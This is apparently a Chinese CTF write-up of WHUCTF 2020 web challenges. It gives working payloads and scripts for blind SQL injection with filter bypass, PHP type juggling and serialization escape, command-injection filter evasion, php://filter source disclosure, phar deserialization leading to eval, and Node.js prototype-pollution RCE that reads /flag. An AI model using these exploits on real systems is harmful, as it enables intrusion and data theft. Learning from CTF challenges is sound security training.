[WHUCTF 2020]Web 部分Write-up

Easy_sqli

简单的注入,过滤了东西双写绕就行

import requests
import time

table ="(selselectect group_concat(table_name) ffromrom infoorrmation_schema.tables whwhereere table_schema regexp database())"

column="(seselectlect group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='f1ag_y0u_wi1l_n3ver_kn0w')"
data = "(seselectlect group_concat(f111114g) frfromom f1ag_y0u_wi1l_n3ver_kn0w)"

url = "http://218.197.154.9:10011/login.php"
payload = {"user":"","pass":"2"}
x=""
for i in range(0,1000):
    max = 127
    min = 33
    while max >= min:
        mid = (max + min) // 2
        str = payload
        str['user'] = 'adm\'oorr ascii(substr({},{},1))>{}#'.format(data, i, mid)
        # print(url+exp)
        r = requests.post(url,data=str)
        # print(r.text)
        if ('Login success!' in r.text):#
            min = mid + 1
        else:
            max = mid
        if max == mid == min:
            x += chr(mid)
            print(x)
            break

flag:

WHUCTF{r3lly_re11y_n0t_d1ffIcult_yet??~}

ezphp

<?php
error_reporting(0);
highlight_file(__file__);
$string_1 = $_GET['str1'];
$string_2 = $_GET['str2'];

//1st
if($_GET['num'] !== '23333' && preg_match('/^23333$/', $_GET['num'])){
    echo '1st ok'."<br>";
}
else{
    die('会代码审计嘛23333');
}


//2nd
if(is_numeric($string_1)){
    $md5_1 = md5($string_1);
    $md5_2 = md5($string_2);

    if($md5_1 != $md5_2){
        $a = strtr($md5_1, 'pggnb', '12345');
        $b = strtr($md5_2, 'pggnb', '12345');
        if($a == $b){
            echo '2nd ok'."<br>";
        }
        else{
            die("can u give me the right str???");
        }
    } 
    else{
        die("no!!!!!!!!");
    }
}
else{
    die('is str1 numeric??????');
}

//3nd
function filter($string){
    return preg_replace('/x/', 'yy', $string);
}

$username = $_POST['username'];

$password = "aaaaa";
$user = array($username, $password);

$r = filter(serialize($user));
if(unserialize($r)[1] == "123456"){
    echo file_get_contents('flag.php');
}

第一层%0a,第二层脚本跑一下

<?php
$count = 0;
for ($i = 1; $i <= 100000000; $i++) {
    $md5 = strtr(md5($i), 'pggnb', '12345');
    if (preg_match('/^0e\d+$/', $md5)) {
        echo $i . " " . md5($i) . "<br>";
        $count++;
    }
    if ($count == 2) {
        break;
    }
}

第三层反序列化字符串逃逸

xxxxxxxxxxxxxxxxxxxx";i:1;s:6:"123456";}

第三层如果不懂可以看下

https://xz.aliyun.com/t/6718


ezcmd

源码:

<?php
if(isset($_GET['ip'])){
  $ip = $_GET['ip'];
  if(preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{1f}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
    echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
    die("fxck your symbol!");
  } else if(preg_match("/ /", $ip)){
    die("no space!");
  } else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
    die("no flag");
  } else if(preg_match("/tac|rm|echo|cat|nl|less|more|tail|head/", $ip)){
    die("cat't read flag");
  }
  $a = shell_exec("ping -c 4 ".$ip); 
  echo "<pre>";
  print_r($a);
}
highlight_file(__FILE__);

?>

乍一看过滤了很多

其实和[GXYCTF2019 ping ping ping ]一题比较类似

让cat执行ls的结果

?ip=127.0.0.1;ca\t$IFS$9`ls`

ezinclude

脑洞题目,在contact中隐藏了参数file,直接伪协议读

thankyou.php?firstname=1&lastname=2&country=australia&subject=&file=php://filter/read=convert.base64-encode/resource=flag.php

Easy_unserialize

反序列化+phar

抓包过程中发现在主页有一个acti0n=????的行为,伪协议读源码返回了hack,大小写绕一下就能读到源码了

?acti0n=PhP://Filter/convert.Base64-encode/resource=view.php

拿到源码

<!DOCTYPE html>
<html lang="zh">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <title></title>
    <link type = "text/css" rel = "stylesheet" href = "css/style.css">
</head>
<body>
    <script type = "text/javascript" color = "0,0,255" opacity = '0.7' zIndex = "-2" count = "99" src = 'js/canvas-nest.min.js'></script> 
    <?php
    #include_once "flag.php"; 
    error_reporting(0);
    class View
    {
        public $dir;
        private $cmd;

        function __construct()
        {
            $this->dir = 'upload/'.md5($_SERVER['REMOTE_ADDR']).'/';
            $this->cmd = 'echo "<div style=\"text-align: center;position: absolute;left: 0;bottom: 0;width: 100%;height: 30px;\">Powered by: xxx</div>";';
            if(!is_dir($this->dir)) {
                mkdir($this->dir, 0777, true);
            }
        }

        function get_file_list() {
            $file = scandir('.');
            return $file;
        }

        function show_file_list() {
            $file = $this->get_file_list();
            for ($i = 2; $i < sizeof($file); $i++) { 
                echo "<p align=\"center\" style=\"font-weight: bold;\">[".strval($i - 1)."]  $file[$i] </p>";
            }
        }

        function show_img($file_name) {
            $name = $file_name;
            $width = getimagesize($name)[0];
            $height = getimagesize($name)[1];
            $times = $width / 200;
            $width /= $times;
            $height /= $times;
            $template = "<img style=\"clear: both;display: block;margin: auto;\" src=\"$this->dir$name\" alt=\"$file_name\" width = \"$width\" height = \"$height\">";
            echo $template;
        }

        function delete_img($file_name) {
            $name = $file_name;
            if (file_exists($name)) {
                @unlink($name);
                if(!file_exists($name)) {
                    echo "<p align=\"center\" style=\"font-weight: bold;\">æåå é¤! 3så跳转</p>";
                    header("refresh:3;url=view.php");
                } else {
                    echo "Can not delete!";
                    exit;
                }
            } else {
                echo "<p align=\"center\" style=\"font-weight: bold;\">æ¾ä¸å°è¿ä¸ªæ件! </p>";
            }
        }

        function __destruct() {
            eval($this->cmd);
        }
    }
    
    $ins = new View();
    chdir($ins->dir);
    echo "<h3>å½åç®å½ä¸º " . $ins->dir . "</h3>";
    $ins->show_file_list();
    if (isset($_POST['show'])) {
        $file_name = $_POST['show'];
        $ins->show_img($file_name);
    }
    if (isset($_POST['delete'])) {
        $file_name = $_POST['delete'];
        $ins->delete_img($file_name);
    }
    unset($ins);
    ?>
</body>
</html>

很明显的phar

在show参数触发即可

<?php
class View
    {
        public $dir;
        private $cmd="show_source(\"/var/www/html/flag.php\");";
}
$a=new View();
@unlink("phar.phar");
$phar = new Phar("5.phar");
$phar->startBuffering();
$phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>");
$phar->setMetadata($a);
$phar->addFromString("test.jpg", "test");
$phar->stopBuffering();

需要注意的是可能需要多包含几次


HappyGame

nodejs原型链污染,可以看官方wp

https://blog.szfszf.top/article/43/

非预期脚本:

import requests
import time
import string
import json

url = "http://218.197.154.9:10001/record"

def deco(idx, c):
    p = ''.join(['\\x' + hex(ord(i))[2:] for i in f'if(process.mainModule.require("fs").readFileSync("/flag").toString()[{idx}]>"{c}"){{}}else{{throw Error()}}']);
    r = {"score":{"__proto__":{"__proto__":{"a":"_$$ND_FUNC$$_``.constructor.constructor(`" + p + "`)()"}},"length":4}}
    return r

flag =''
for i in range(0,1000):
    max = 127
    min = 32
    while max >=min:
        #print(str(max)+"-------"+str(min))
        mid = (max + min) // 2
        r = requests.post(url, json=deco(i, chr(mid)))
        if r.status_code==200:
            min = mid +1
        else:
            max = mid 
        if max == mid == min:
            flag += chr(mid)
            print(flag)
            break
        if '}' in flag[:-1]:
            exit()

BookShop

正在尝试复现

2 thoughts on “[WHUCTF 2020]Web 部分Write-up

发表评论

邮箱地址不会被公开。 必填项已用*标注